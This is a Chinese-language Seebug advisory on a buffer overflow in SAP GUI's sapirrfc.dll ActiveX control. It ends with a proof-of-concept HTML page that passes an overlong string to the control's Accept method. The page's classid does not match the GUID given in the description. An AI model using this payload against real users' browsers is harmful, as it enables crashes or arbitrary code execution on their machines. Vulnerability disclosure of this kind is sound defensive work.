SAP AG SAPgui sapirrfc.dll ActiveX控件缓冲区溢出漏洞

2009-06-11T00:00:00
ID SSV:11581
Type seebug
Reporter Root
Modified 2009-06-11T00:00:00

Description

BUGTRAQ ID: 35256

SAPgui是SAP软件的图形用户界面客户端。

SAP GUI所捆绑的SAPIrRfc ActiveX组件(sapirrfc.dll,GUID = F6908F83-ADA6-11D0-87AA-00AA00198702)没有正确的验证用户对Accept函数所传送的参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能触发缓冲区溢出,导致在目标系统上执行任意代码。

SAP Sapgui 6.4 厂商补丁:

SAP

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href="http://www.sap.com/" target="_blank" rel=external nofollow>http://www.sap.com/</a>

                                        
                                            
                                                &lt;html&gt;
&lt;object classid='clsid:77F12F8A-F117-11D0-8CF1-00A0C91D9D87' id='target' /&gt;
&lt;script&gt;

arg1=&quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;

target.Accept arg1

&lt;/script&gt;
&lt;/html&gt;